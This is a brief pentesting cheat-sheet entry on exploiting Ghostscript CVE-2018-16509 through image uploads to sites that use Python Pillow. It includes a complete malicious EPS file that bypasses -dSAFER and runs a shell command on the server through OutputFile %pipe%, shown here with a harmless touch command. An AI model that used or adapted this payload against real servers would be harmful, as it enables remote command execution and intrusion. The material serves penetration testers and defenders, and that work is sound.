# GhostScript Pentesting

GhostScriipt is an interpreter for the PostScript language and PDF files. It might be vulnerable to code execution.

### Arbitrary Command Execution (CVE-2018-16509) Before v9.24 <a href="#arbitrary-command-execution-cve-2018-16509-before-v924" id="arbitrary-command-execution-cve-2018-16509-before-v924"></a>

Reference: <https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509>

If target website uses the functionality which allows user to upload image files associated Python's **Pillow (PIL)**, we can execute remote command over **GhostScript** vulnerability (**`-dSAFER`** bypass using **`OutputFile`**).\
Create an image file in which contents as below, then upload it. Command will be executed in the target server.

```
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%touch /tmp/hello.txt) currentdevice putdeviceprops
```

### References <a href="#references" id="references"></a>

* [SecLists](https://seclists.org/oss-sec/2018/q3/142)